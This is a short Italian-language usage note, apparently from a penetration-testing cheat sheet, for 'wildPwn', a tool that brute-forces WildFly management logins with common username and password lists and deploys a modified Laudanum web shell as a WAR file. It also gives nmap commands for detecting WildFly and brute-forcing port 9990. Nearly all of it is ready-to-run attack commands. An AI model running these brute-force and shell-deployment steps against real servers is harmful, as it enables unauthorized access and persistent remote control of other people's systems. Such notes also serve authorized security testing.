
Bruteforcer e shell deployer per WildFly
È uno strumento per WildFly. Può essere utilizzato per brute force o per deploy di shell. wildPwn.war contiene una shell Laudanum modificata. userList.txt contiene nomi utente comuni e passList.txt contiene password comuni.
Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
Deploy di Shell
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>
https://artofpwn.com/wildfly-exploitation.html
Rilevamento
nmap --script wildfly-detect <TARGET>
Forza Bruta
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>